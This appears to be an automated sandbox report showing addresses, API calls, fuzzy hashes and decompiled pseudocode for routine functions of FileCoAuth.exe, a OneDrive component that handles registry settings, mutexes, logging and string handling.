    0x00e9e126
    0x00e9e13a
    0x00e9e13f
    0x00e9e141
    0x00e9e14b
    0x00e9e152
    0x00e9e165
    0x00e9e16a
    0x00e9e176
    0x00e9e17b
    0x00e9e18f
    0x00e9e194
    0x00e9e19e
    0x00e9e1a3
    0x00e9e1ad
    0x00e9e1ad
    0x00e9e1ba
    0x00e9e1bf
    0x00e9e1c8
    0x00e9e1cd
    0x00e9e1d9
    0x00e9e1de
    0x00e9e1e7
    0x00e9e1ec
    0x00e9e1f6
    0x00e9e200

    APIs
    • __EH_prolog3_GS.LIBCMT ref: 00E9E0BB
      • Part of subcall function 00E953DD: __EH_prolog3.LIBCMT ref: 00E953E4
      • Part of subcall function 00E997F4: __EH_prolog3.LIBCMT ref: 00E997FB
      • Part of subcall function 00E94307: ??3@YAXPAX@Z.MSVCR120 ref: 00E94332
      • Part of subcall function 00E9F5DC: RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,00020006,00000000,00000000,00000000), ref: 00E9F60F
      • Part of subcall function 00E9F5DC: RegSetValueExW.ADVAPI32(00000000,?,00000000,00000001,00000008,?), ref: 00E9F655
      • Part of subcall function 00E9F5DC: RegCloseKey.ADVAPI32(00000000), ref: 00E9F660
    Strings
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp Download File
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: H_prolog3$??3@CloseCreateH_prolog3_Value
    • String ID: OneDrive$Software\Microsoft\OneDrive$UserFolder
    • API String ID: 654568077-2333273078
    • Opcode ID: e613a183ce01bc2194a98bdb6fa012277e881289f945c99e507f62828438e318
    • Instruction ID: f964312f0ecc6938c209e9d8d63dea0df598385fb8ef6a9af2b52434d7d6dec2
    • Opcode Fuzzy Hash: e613a183ce01bc2194a98bdb6fa012277e881289f945c99e507f62828438e318
    • Instruction Fuzzy Hash: 70413DB1800288EADF11E7E0CD59FDEBBB8AF59704F441198F105BB1C2DBB05A49C761
    Uniqueness

    Uniqueness Score: -1,00%

    Function 00E9CC43, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100COMMON
    Download Yara Rule
    C-Code - Quality: 75%
    			E00E9CC43(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t35;
				void* _t46;
				void* _t48;
				intOrPtr* _t58;
				short* _t79;
				intOrPtr _t81;
				void* _t82;

				_t35 = E00EA3194(E00EA4683, __ebx, __edi, __esi);
				_t58 = __ecx;
				 *(_t82 - 4) =  *(_t82 - 4) & 0x00000000;
				_t81 = __ecx + 0x40;
				 *(_t82 - 0x30) =  *(_t82 - 0x30) & 0x00000000;
				_t79 =  *((intOrPtr*)(_t82 + 8));
				 *((intOrPtr*)(_t82 - 0x40)) = _t79;
				 *((intOrPtr*)(_t82 - 0x2c)) = _t81;
				__imp___Mtx_lock(_t81, 0x34);
				E00E9E349(_t35);
				 *(_t82 - 4) = 1;
				 *(_t79 + 0x10) =  *(_t79 + 0x10) & 0x00000000;
				 *((intOrPtr*)(_t79 + 0x14)) = 7;
				 *_t79 = 0;
				 *(_t82 - 0x30) = 1;
				 *((intOrPtr*)( *_t58 + 0x18))(_t79);
				 *((intOrPtr*)( *_t58))(_t82 - 0x28);
				 *(_t82 - 4) = 2;
				if(E00E99650(_t82 - 0x28, 0,  *((intOrPtr*)(_t82 - 0x18)), L"Personal", E00E94E74(L"Personal")) == 0 || E00E99650(_t82 - 0x28, 0,  *((intOrPtr*)(_t82 - 0x18)), 0xea7340, E00E94E74(0xea7340)) == 0) {
					 *((intOrPtr*)( *_t58 + 0x10))(_t82 - 0x3c);
					 *(_t82 - 4) = 3;
					_push( *((intOrPtr*)(_t82 - 0x2c)));
					_t46 = E00E9AE61( *((intOrPtr*)(_t82 - 0x3c)),  *((intOrPtr*)(_t82 - 0x38)));
					if(_t46 !=  *((intOrPtr*)(_t82 - 0x38)) && _t79 != _t46) {
						E00E94BDD(_t79, _t46, 0, 0xffffffff);
					}
					 *(_t82 - 4) = 2;
					E00E949AF(_t82 - 0x3c);
				} else {
					_t55 = _t82 - 0x28;
					if(_t79 != _t82 - 0x28) {
						E00E94BDD(_t79, _t55, 0, 0xffffffff);
					}
				}
				 *(_t82 - 4) = 1;
				_t48 = E00E94307(_t82 - 0x28, 1, 0);
				 *(_t82 - 4) = 0;
				__imp___Mtx_unlock(_t81);
				E00E9E349(_t48);
				return E00EA3152(_t58, _t79, _t81);
			}










    0x00e9cc4a
    0x00e9cc4f
    0x00e9cc51
    0x00e9cc55
    0x00e9cc58
    0x00e9cc5c
    0x00e9cc60
    0x00e9cc63
    0x00e9cc66
    0x00e9cc6e
    0x00e9cc76
    0x00e9cc7b
    0x00e9cc7f
    0x00e9cc86
    0x00e9cc8b
    0x00e9cc91
    0x00e9cc9c
    0x00e9cc9e
    0x00e9ccc2
    0x00e9cd03
    0x00e9cd06
    0x00e9cd0a
    0x00e9cd13
    0x00e9cd1b
    0x00e9cd28
    0x00e9cd28
    0x00e9cd2d
    0x00e9cd34
    0x00e9cce6
    0x00e9cce6
    0x00e9cceb
    0x00e9ccf4
    0x00e9ccf4
    0x00e9cceb
    0x00e9cd39
    0x00e9cd44
    0x00e9cd49
    0x00e9cd4e
    0x00e9cd56
    0x00e9cd62

    APIs
    • __EH_prolog3_GS.LIBCMT ref: 00E9CC4A
    • _Mtx_lock.MSVCP120(?,?,?,?,?,?,?,?,?,?,?,?,?,00000034), ref: 00E9CC66
      • Part of subcall function 00E9E349: ?_Throw_C_error@std@@YAXH@Z.MSVCP120(00000000,?,00E9BECC,00000000,00000004,00E9BE52), ref: 00E9E357
      • Part of subcall function 00E99650: ?_Xout_of_range@std@@YAXPBD@Z.MSVCP120(invalid string position,?,00E9946E,00000000,?,?,?), ref: 00E99664
    • _Mtx_unlock.MSVCP120(?,00000001,00000000,?,?,?,?,?,?,?,?,?,?,?,00000034), ref: 00E9CD4E
      • Part of subcall function 00E94BDD: ?_Xout_of_range@std@@YAXPBD@Z.MSVCP120(invalid string position,00000007,?,?,?,00E94E2B,?,00000007,BB40E64E,00000007,?,?,?,00E94EC9,00000007,00000000), ref: 00E94BF9
    Strings
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp Download File
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: Xout_of_range@std@@$C_error@std@@H_prolog3_Mtx_lockMtx_unlockThrow_
    • String ID: Personal
    • API String ID: 2696486361-150736850
    • Opcode ID: f2610c15be37021dfada0d847e44b54031a9eae47f942f0346cae6ddcd430cb0
    • Instruction ID: e43c0a5f7a73b24040e6190dbb8fb5a50511c3a3186112aba7df7d24f33af877
    • Opcode Fuzzy Hash: f2610c15be37021dfada0d847e44b54031a9eae47f942f0346cae6ddcd430cb0
    • Instruction Fuzzy Hash: 2B31A171A00209EFDF04EBA4D846FEDBBB4AF09314F142059F101BB2D2DB74AA45CB21
    Uniqueness

    Uniqueness Score: -1,00%

    Function 00E9CDC2, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 71COMMON
    Download Yara Rule
    C-Code - Quality: 80%
    			E00E9CDC2(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t28;
				void* _t31;
				void* _t36;
				intOrPtr* _t47;
				intOrPtr _t62;
				intOrPtr _t64;
				void* _t65;
				void* _t66;

				_t66 = __eflags;
				_t28 = E00EA3194(E00EA470E, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t65 - 0x130)) = __ecx;
				 *(_t65 - 4) =  *(_t65 - 4) & 0x00000000;
				_t64 = __ecx + 0x40;
				 *(_t65 - 0x138) =  *(_t65 - 0x138) & 0x00000000;
				_t62 =  *((intOrPtr*)(_t65 + 8));
				 *((intOrPtr*)(_t65 - 0x140)) = _t62;
				 *((intOrPtr*)(_t65 - 0x13c)) = _t64;
				__imp___Mtx_lock(_t64, 0x134);
				E00E9E349(_t28);
				 *(_t65 - 4) = 1;
				E00EA122E(_t65 - 0x134);
				 *(_t65 - 4) = 2;
				_t31 = E00EA1237(__ebx, _t65 - 0x134, __edx, _t62, _t64, _t66);
				E00E94E9D(_t62, L"Personal");
				_t67 = _t31;
				 *(_t65 - 0x138) = 1;
				_t47 =  *((intOrPtr*)(_t65 - 0x130));
				if(_t31 != 0) {
					 *((intOrPtr*)( *_t47 + 0x18))(_t62);
				}
				E00E953DD(_t65 - 0x12c, _t62, _t64, _t67);
				 *(_t65 - 4) = 3;
				_push(_t65 - 0x12c);
				if( *((intOrPtr*)( *_t47 + 0xc))() != 0) {
					_t40 = _t65 - 0x12c;
					if(_t62 != _t65 - 0x12c) {
						E00E94BDD(_t62, _t40, 0, 0xffffffff);
					}
					_t57 = _t47 + 0x28;
					if(_t47 + 0x28 != _t62) {
						E00E94BDD(_t57, _t62, 0, 0xffffffff);
					}
				}
				 *(_t65 - 4) = 2;
				_t36 = E00E94681(_t65 - 0x12c);
				 *(_t65 - 4) = 1;
				 *((intOrPtr*)(_t65 - 0x134)) = 0xea68d4;
				 *(_t65 - 4) = 0;
				__imp___Mtx_unlock(_t64);
				E00E9E349(_t36);
				return E00EA3152(_t47, _t62, _t64);
			}











    0x00e9cdc2
    0x00e9cdcc
    0x00e9cdd1
    0x00e9cdd7
    0x00e9cddb
    0x00e9cdde
    0x00e9cde5
    0x00e9cde9
    0x00e9cdef
    0x00e9cdf5
    0x00e9cdfd
    0x00e9ce02
    0x00e9ce0f
    0x00e9ce14
    0x00e9ce18
    0x00e9ce26
    0x00e9ce2b
    0x00e9ce2d
    0x00e9ce37
    0x00e9ce3d
    0x00e9ce44
    0x00e9ce44
    0x00e9ce4d
    0x00e9ce52
    0x00e9ce5e
    0x00e9ce66
    0x00e9ce68
    0x00e9ce70
    0x00e9ce79
    0x00e9ce79
    0x00e9ce7e
    0x00e9ce83
    0x00e9ce8a
    0x00e9ce8a
    0x00e9ce83
    0x00e9ce8f
    0x00e9ce99
    0x00e9ce9e
    0x00e9cea2
    0x00e9ceac
    0x00e9ceb1
    0x00e9ceb9
    0x00e9cec5

    APIs
    • __EH_prolog3_GS.LIBCMT ref: 00E9CDCC
    • _Mtx_lock.MSVCP120(?), ref: 00E9CDF5
      • Part of subcall function 00E9E349: ?_Throw_C_error@std@@YAXH@Z.MSVCP120(00000000,?,00E9BECC,00000000,00000004,00E9BE52), ref: 00E9E357
      • Part of subcall function 00EA1237: __EH_prolog3_GS.LIBCMT ref: 00EA123E
    • _Mtx_unlock.MSVCP120(?), ref: 00E9CEB1
    Strings
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp Download File
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: H_prolog3_$C_error@std@@Mtx_lockMtx_unlockThrow_
    • String ID: Personal
    • API String ID: 662603466-150736850
    • Opcode ID: 5cf82028d428d0c1931b96cca90c52299daebb62797135b561d479f9ec17a3fc
    • Instruction ID: 45d89c38deda768cb87754aeab0ad1aff7ddffd28c846807a4fc8452c8c9b691
    • Opcode Fuzzy Hash: 5cf82028d428d0c1931b96cca90c52299daebb62797135b561d479f9ec17a3fc
    • Instruction Fuzzy Hash: 2D219C709012189BCF11EB24C886BECB7B4AF5B318F2410C8E045BB2C2DB746F49CB51
    Uniqueness

    Uniqueness Score: -1,00%

    Function 00E93B35, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 69COMMON
    Download Yara Rule
    C-Code - Quality: 16%
    			E00E93B35(intOrPtr* _a8, intOrPtr* _a12, intOrPtr _a16) {
				signed int _v8;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v40;
				intOrPtr* _v48;
				char* _v52;
				intOrPtr _v56;
				signed int _v64;
				intOrPtr* _v72;
				intOrPtr _v76;
				char _v80;
				void* __edi;
				void* __esi;
				signed int _t20;
				intOrPtr _t25;
				intOrPtr _t26;
				void* _t27;
				intOrPtr* _t28;
				signed int _t29;
				intOrPtr* _t30;
				signed int _t31;
				intOrPtr _t32;
				void* _t40;
				signed int _t41;

				_t20 =  *0xeb0090; // 0xbb40e64e
				_v8 = _t20 ^ _t41;
				_t28 = _a8;
				_v76 = 0xea76b8;
				_v72 = _t28;
				_v80 = 1;
				if(_t28 == 0) {
					_t29 = 0;
				} else {
					_t40 = _t28 + 2;
					do {
						_t26 =  *_t28;
						_t28 = _t28 + 2;
					} while (_t26 != 0);
					_t29 = _t28 - _t40 >> 1;
				}
				_v64 = _t29;
				_t30 = _a12;
				_v52 = "instance";
				_v56 = 1;
				_v48 = _t30;
				if(_t30 == 0) {
					_t31 = 0;
				} else {
					_t40 = _t30 + 2;
					do {
						_t25 =  *_t30;
						_t30 = _t30 + 2;
					} while (_t25 != 0);
					_t31 = _t30 - _t40 >> 1;
				}
				_v40 = _t31;
				_t32 = 3;
				_v24 = _a16;
				_v28 = "hr";
				_v32 = _t32;
				__imp__?LoggingWriteStructuredEvent@@YGXPBDI0ABU_GUID@@IIIQAUStructuredEventParameter@@@Z(0x1b, "SyncEngineFileInfoProvider::GetPropertyHandlerFromPath", 0xea7810, 0x38728f57, 1, _t32,  &_v80);
				__imp__?LoggingRotateIfNeeded@@YGXXZ();
				return E00EA29F2(_t27, _v8 ^ _t41, 0, 1, _t40, "d:\\dbs\\sh\\odib\\0313_155253\\cmd\\24\\client\\onedrive\\product\\filecoauth\\filecoauth\\syncenginefileinfoprovider.cpp");
			}




























    0x00e93b3d
    0x00e93b44
    0x00e93b47
    0x00e93b50
    0x00e93b58
    0x00e93b5b
    0x00e93b60
    0x00e93b76
    0x00e93b62
    0x00e93b62
    0x00e93b65
    0x00e93b65
    0x00e93b68
    0x00e93b6b
    0x00e93b72
    0x00e93b72
    0x00e93b78
    0x00e93b7b
    0x00e93b7e
    0x00e93b85
    0x00e93b88
    0x00e93b8d
    0x00e93ba3
    0x00e93b8f
    0x00e93b8f
    0x00e93b92
    0x00e93b92
    0x00e93b95
    0x00e93b98
    0x00e93b9f
    0x00e93b9f
    0x00e93baa
    0x00e93bad
    0x00e93bae
    0x00e93bcd
    0x00e93bd4
    0x00e93bd7
    0x00e93bdd
    0x00e93bf2

    APIs
    • ?LoggingWriteStructuredEvent@@YGXPBDI0ABU_GUID@@IIIQAUStructuredEventParameter@@@Z.LOGGINGPLATFORM(d:\dbs\sh\odib\0313_155253\cmd\24\client\onedrive\product\filecoauth\filecoauth\syncenginefileinfoprovider.cpp,0000001B,SyncEngineFileInfoProvider::GetPropertyHandlerFromPath,00EA7810,38728F57,00000001,00000003,?), ref: 00E93BD7
    • ?LoggingRotateIfNeeded@@YGXXZ.LOGGINGPLATFORM ref: 00E93BDD
    Strings
    • SyncEngineFileInfoProvider::GetPropertyHandlerFromPath, xrefs: 00E93BC1
    • d:\dbs\sh\odib\0313_155253\cmd\24\client\onedrive\product\filecoauth\filecoauth\syncenginefileinfoprovider.cpp, xrefs: 00E93BC8
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp Download File
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: LoggingStructured$EventEvent@@Needed@@Parameter@@@RotateWrite
    • String ID: SyncEngineFileInfoProvider::GetPropertyHandlerFromPath$d:\dbs\sh\odib\0313_155253\cmd\24\client\onedrive\product\filecoauth\filecoauth\syncenginefileinfoprovider.cpp
    • API String ID: 2559330748-2046853744
    • Opcode ID: b84787c4103dcf261fe1923aab64393cb7d57a0db1bfe71e56674de189893020
    • Instruction ID: c30b7f7e9170c8db530fa16b02bb322849edfcbf6f1e3b6b418612aa4913386d
    • Opcode Fuzzy Hash: b84787c4103dcf261fe1923aab64393cb7d57a0db1bfe71e56674de189893020
    • Instruction Fuzzy Hash: 0C21CF70E042099BCF18CF6ACC16ABEBBB0EF89300F14451EE846BB240D7316E028B54
    Uniqueness

    Uniqueness Score: -1,00%

    Function 00E95904, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 68COMMON
    Download Yara Rule
    C-Code - Quality: 37%
    			E00E95904(intOrPtr* __ecx, signed int _a4, signed int _a8, intOrPtr _a12) {
				void* __ebx;
				void* __edi;
				intOrPtr _t21;
				signed int _t22;
				intOrPtr* _t33;
				void* _t35;
				signed int _t37;
				signed int _t38;
				intOrPtr* _t40;
				signed int _t42;
				intOrPtr* _t44;
				intOrPtr* _t45;

				_t44 = _a4;
				_t45 = __ecx;
				_t37 = _a8;
				_t21 =  *((intOrPtr*)(_t44 + 0x10));
				if(_t21 < _t37) {
					__imp__?_Xout_of_range@std@@YAXPBD@Z("invalid string position");
				}
				_t22 = _t21 - _t37;
				_t38 =  *(_t45 + 0x10);
				_a4 = _t38;
				_t35 =  <  ? _t22 : _a12;
				if((_t22 | 0xffffffff) - _t38 <= _t35) {
					__imp__?_Xlength_error@std@@YAXPBD@Z("string too long");
				}
				if(_t35 != 0 && E00E94D8F(_t35, _t45, _t44, _t38 + _t35, 0) != 0) {
					if( *((intOrPtr*)(_t44 + 0x14)) >= 8) {
						_t44 =  *_t44;
					}
					if( *((intOrPtr*)(_t45 + 0x14)) < 8) {
						_t40 = _t45;
					} else {
						_t40 =  *_t45;
					}
					E00E942E3(_t40 +  *(_t45 + 0x10) * 2, _t44 + _a8 * 2, _t35);
					_t42 = _a4 + _t35;
					 *(_t45 + 0x10) = _t42;
					if( *((intOrPtr*)(_t45 + 0x14)) < 8) {
						_t33 = _t45;
					} else {
						_t33 =  *_t45;
					}
					 *((short*)(_t33 + _t42 * 2)) = 0;
				}
				return _t45;
			}















    0x00e9590c
    0x00e9590f
    0x00e95911
    0x00e95914
    0x00e95919
    0x00e95920
    0x00e95920
    0x00e95929
    0x00e9592b
    0x00e95930
    0x00e95933
    0x00e9593d
    0x00e95944
    0x00e95944
    0x00e9594c
    0x00e95963
    0x00e95965
    0x00e95965
    0x00e9596b
    0x00e95971
    0x00e9596d
    0x00e9596d
    0x00e9596d
    0x00e95982
    0x00e9598d
    0x00e95993
    0x00e95996
    0x00e9599c
    0x00e95998
    0x00e95998
    0x00e95998
    0x00e959a0
    0x00e959a0
    0x00e959aa

    APIs
    • ?_Xout_of_range@std@@YAXPBD@Z.MSVCP120(invalid string position,00000000,00000000,?,?,00E99934,?,00000000,000000FF,00000000,?,?,00E912F1,?,00000000,00000000), ref: 00E95920
    • ?_Xlength_error@std@@YAXPBD@Z.MSVCP120(string too long,00000000,00000000,?,?,00E99934,?,00000000,000000FF,00000000,?,?,00E912F1,?,00000000,00000000), ref: 00E95944
    Strings
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp Download File
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: Xlength_error@std@@Xout_of_range@std@@
    • String ID: invalid string position$string too long
    • API String ID: 737550999-4289949731
    • Opcode ID: 960cec4d413274743886a69329600a0474734469ad8556190c87b4087d360f69
    • Instruction ID: 6cb13121c40270e2ad636d27a3a9e6a097ba34614604c5dde766fa80e133a63c
    • Opcode Fuzzy Hash: 960cec4d413274743886a69329600a0474734469ad8556190c87b4087d360f69
    • Instruction Fuzzy Hash: C421C072300604EFDB24CF6CCC8496AB7A9FF85765710192EE455E7290C730E959CBA0
    Uniqueness

    Uniqueness Score: -1,00%

    Function 00E991E6, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON
    Download Yara Rule
    C-Code - Quality: 16%
    			E00E991E6(intOrPtr* _a8, intOrPtr _a12, intOrPtr* _a16) {
				signed int _v8;
				signed int _v16;
				intOrPtr* _v24;
				char* _v28;
				intOrPtr _v32;
				intOrPtr _v48;
				char* _v52;
				intOrPtr _v56;
				signed int _v64;
				intOrPtr* _v72;
				char* _v76;
				char _v80;
				void* __edi;
				void* __esi;
				signed int _t20;
				intOrPtr _t25;
				intOrPtr _t26;
				void* _t27;
				intOrPtr* _t28;
				signed int _t29;
				intOrPtr* _t30;
				signed int _t31;
				void* _t39;
				signed int _t40;

				_t20 =  *0xeb0090; // 0xbb40e64e
				_v8 = _t20 ^ _t40;
				_t28 = _a8;
				_v76 = "file";
				_v72 = _t28;
				_v80 = 1;
				if(_t28 == 0) {
					_t29 = 0;
				} else {
					_t39 = _t28 + 2;
					do {
						_t26 =  *_t28;
						_t28 = _t28 + 2;
					} while (_t26 != 0);
					_t29 = _t28 - _t39 >> 1;
				}
				_v64 = _t29;
				_t30 = _a16;
				_v52 = "line";
				_v56 = 3;
				_v48 = _a12;
				_v28 = "message";
				_v32 = 1;
				_v24 = _t30;
				if(_t30 == 0) {
					_t31 = 0;
				} else {
					_t39 = _t30 + 2;
					do {
						_t25 =  *_t30;
						_t30 = _t30 + 2;
					} while (_t25 != 0);
					_t31 = _t30 - _t39 >> 1;
				}
				_v16 = _t31;
				__imp__?LoggingWriteStructuredEvent@@YGXPBDI0ABU_GUID@@IIIQAUStructuredEventParameter@@@Z(0x1b, "FailFastTrace", 0xea7d10, 0xcc2f8c83, 1, 3,  &_v80);
				__imp__?LoggingRotateIfNeeded@@YGXXZ();
				return E00EA29F2(_t27, _v8 ^ _t40, 0, 1, _t39, "d:\\dbs\\sh\\odib\\0313_155253\\cmd\\17\\client\\onedrive\\product\\ux\\shared\\failfast.cpp");
			}



























    0x00e991ee
    0x00e991f5
    0x00e991f8
    0x00e99201
    0x00e99209
    0x00e9920c
    0x00e99211
    0x00e99227
    0x00e99213
    0x00e99213
    0x00e99216
    0x00e99216
    0x00e99219
    0x00e9921c
    0x00e99223
    0x00e99223
    0x00e9922c
    0x00e9922f
    0x00e99232
    0x00e99239
    0x00e99240
    0x00e99243
    0x00e9924a
    0x00e9924d
    0x00e99252
    0x00e99268
    0x00e99254
    0x00e99254
    0x00e99257
    0x00e99257
    0x00e9925a
    0x00e9925d
    0x00e99264
    0x00e99264
    0x00e9926d
    0x00e9928a
    0x00e99290
    0x00e992a5

    APIs
    • ?LoggingWriteStructuredEvent@@YGXPBDI0ABU_GUID@@IIIQAUStructuredEventParameter@@@Z.LOGGINGPLATFORM(d:\dbs\sh\odib\0313_155253\cmd\17\client\onedrive\product\ux\shared\failfast.cpp,0000001B,FailFastTrace,00EA7D10,CC2F8C83,00000001,00000003,?,00000000), ref: 00E9928A
    • ?LoggingRotateIfNeeded@@YGXXZ.LOGGINGPLATFORM ref: 00E99290
    Strings
    • FailFastTrace, xrefs: 00E9927E
    • d:\dbs\sh\odib\0313_155253\cmd\17\client\onedrive\product\ux\shared\failfast.cpp, xrefs: 00E99285
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp Download File
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: LoggingStructured$EventEvent@@Needed@@Parameter@@@RotateWrite
    • String ID: FailFastTrace$d:\dbs\sh\odib\0313_155253\cmd\17\client\onedrive\product\ux\shared\failfast.cpp
    • API String ID: 2559330748-1142512593
    • Opcode ID: a049d0e73a6193a9a00f5570b0f53edc2c0781567dc976a66c48328c109ca248
    • Instruction ID: 184b4423402d113e7086b82267eb27220258d0fab3841273af93c5aa1bef04ea
    • Opcode Fuzzy Hash: a049d0e73a6193a9a00f5570b0f53edc2c0781567dc976a66c48328c109ca248
    • Instruction Fuzzy Hash: 08219274D01209ABCF18DF5AE9555AEBBB4EF89704F54501EE8067B351CB706A028B40
    Uniqueness

    Uniqueness Score: -1,00%

    Function 00EA1488, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 49COMMON
    Download Yara Rule
    C-Code - Quality: 74%
    			E00EA1488(intOrPtr* _a4, char _a8, intOrPtr* _a12, intOrPtr _a16) {
				intOrPtr _v20;
				void* __esi;
				intOrPtr* _t47;
				intOrPtr* _t48;
				intOrPtr _t49;
				intOrPtr* _t50;
				intOrPtr* _t68;
				intOrPtr* _t72;
				intOrPtr _t76;
				intOrPtr _t77;
				intOrPtr _t78;
				intOrPtr* _t83;
				intOrPtr* _t84;
				void* _t88;
				intOrPtr* _t89;

				_push(_v20);
				L00EA29EC();
				_push(0);
				_push(0);
				L00EA3138();
				asm("int3");
				_push(_t88);
				_t95 =  *0x00000004 - 0x6666665;
				if( *0x00000004 >= 0x6666665) {
					__imp__?_Xlength_error@std@@YAXPBD@Z("map/set<T> too long");
				}
				_push(_a16);
				_t47 = E00EA144C(0, _t88, _t95);
				 *((intOrPtr*)(4)) =  *((intOrPtr*)(4)) + 1;
				_t72 = _t47;
				_t48 = _a12;
				 *((intOrPtr*)(_t72 + 4)) = _t48;
				_t76 =  *0x00000000;
				if(_t48 != _t76) {
					__eflags = _a8;
					if(_a8 == 0) {
						 *((intOrPtr*)(_t48 + 8)) = _t72;
						_t77 =  *0x00000000;
						__eflags = _t48 -  *((intOrPtr*)(_t77 + 8));
						if(_t48 ==  *((intOrPtr*)(_t77 + 8))) {
							 *((intOrPtr*)(_t77 + 8)) = _t72;
						}
					} else {
						 *_t48 = _t72;
						_t83 =  *0x00000000;
						__eflags = _t48 -  *_t83;
						if(_t48 ==  *_t83) {
							 *_t83 = _t72;
						}
					}
				} else {
					 *((intOrPtr*)(_t76 + 4)) = _t72;
					 *((intOrPtr*)( *0x00000000)) = _t72;
					 *((intOrPtr*)( *0x00000000 + 8)) = _t72;
				}
				_t49 =  *((intOrPtr*)(_t72 + 4));
				_t89 = _t72;
				while( *((char*)(_t49 + 0xc)) == 0) {
					_t50 =  *((intOrPtr*)(_t89 + 4));
					_t84 =  *((intOrPtr*)(_t50 + 4));
					_t78 =  *_t84;
					__eflags = _t50 - _t78;
					if(_t50 != _t78) {
						__eflags =  *((char*)(_t78 + 0xc));
						if( *((char*)(_t78 + 0xc)) != 0) {
							__eflags = _t89 -  *_t50;
							if(_t89 ==  *_t50) {
								_t89 = _t50;
								E00E95088(0, _t89);
							}
							 *((char*)( *((intOrPtr*)(_t89 + 4)) + 0xc)) = 1;
							 *((char*)( *((intOrPtr*)( *((intOrPtr*)(_t89 + 4)) + 4)) + 0xc)) = 0;
							E00E95042(0,  *((intOrPtr*)( *((intOrPtr*)(_t89 + 4)) + 4)));
							L21:
							_t49 =  *((intOrPtr*)(_t89 + 4));
							continue;
						}
						L17:
						 *((char*)(_t50 + 0xc)) = 1;
						 *((char*)(_t78 + 0xc)) = 1;
						 *((char*)( *((intOrPtr*)( *((intOrPtr*)(_t89 + 4)) + 4)) + 0xc)) = 0;
						_t89 =  *((intOrPtr*)( *((intOrPtr*)(_t89 + 4)) + 4));
						goto L21;
					}
					_t78 =  *((intOrPtr*)(_t84 + 8));
					__eflags =  *((char*)(_t78 + 0xc));
					if( *((char*)(_t78 + 0xc)) == 0) {
						goto L17;
					}
					__eflags = _t89 -  *((intOrPtr*)(_t50 + 8));
					if(_t89 ==  *((intOrPtr*)(_t50 + 8))) {
						_t89 = _t50;
						E00E95042(0, _t89);
					}
					 *((char*)( *((intOrPtr*)(_t89 + 4)) + 0xc)) = 1;
					 *((char*)( *((intOrPtr*)( *((intOrPtr*)(_t89 + 4)) + 4)) + 0xc)) = 0;
					E00E95088(0,  *((intOrPtr*)( *((intOrPtr*)(_t89 + 4)) + 4)));
					goto L21;
				}
				 *((char*)( *((intOrPtr*)( *0x00000000 + 4)) + 0xc)) = 1;
				_t68 = _a4;
				 *_t68 = _t72;
				return _t68;
			}


















